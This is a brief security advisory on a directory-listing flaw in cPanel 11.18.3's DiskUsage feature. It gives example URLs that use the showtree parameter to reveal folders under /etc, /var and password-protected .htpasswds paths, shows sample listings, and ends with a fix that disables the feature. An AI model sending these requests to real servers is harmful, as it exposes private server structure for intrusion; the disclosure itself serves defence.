There is a built-in bug connected to the DiskUsage function of cPanel. It allows you to list folders which should not be seen by unauthorized users.
It simply needs you to submit the Url in browser:
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/etc
Now you will see the folders only which is inside /etc
exapmle :
Directory Space Used:
etc/Pegasus 0.00 Meg
etc/X11 0.07 Meg
etc/X11/applnk 0.00 Meg
etc/X11/fs 0.00 Meg
etc/X11/serverconfig 0.00 Meg
etc/X11/starthere 0.03 Meg
etc/X11/sysconfig 0.00 Meg
other example to see the folders in /var :
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var
that will shows you folders inside /var , like :
var/www/cgi-bin 0.00 Meg
var/www/error 0.19 Meg
var/www/error/include 0.01 Meg
var/www/html 0.00 Meg
var/www/icons 0.89 Meg
var/www/icons/small 0.25 Meg
var/yp 0.02 Meg
var/yp/binding 0.00 Meg
…etc
another example, you can see the folders which is been protected by a deny rule or authentication for password protected folders,
for example if you type :
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/home/user/.htpasswds
You will see all the folders inside although you are not supposed to.
example:
home/user/.htpasswds/public_html 0.01 Meg
home/user/.htpasswds/public_html/admin 0.00 Meg
home/user/.htpasswds/public_html/admin/login 0.00 Meg
tested on / cPanel version 11.18.3
Solution:
/var/cpanel/features/default is the file that handles the features of the cpanel.
Add to it:
diskusageviewer="0"
Then restart the cPanel:
/etc/init.d/cpanel restart
This way you will disable the option since it is not THAT important but is a huge security hole.
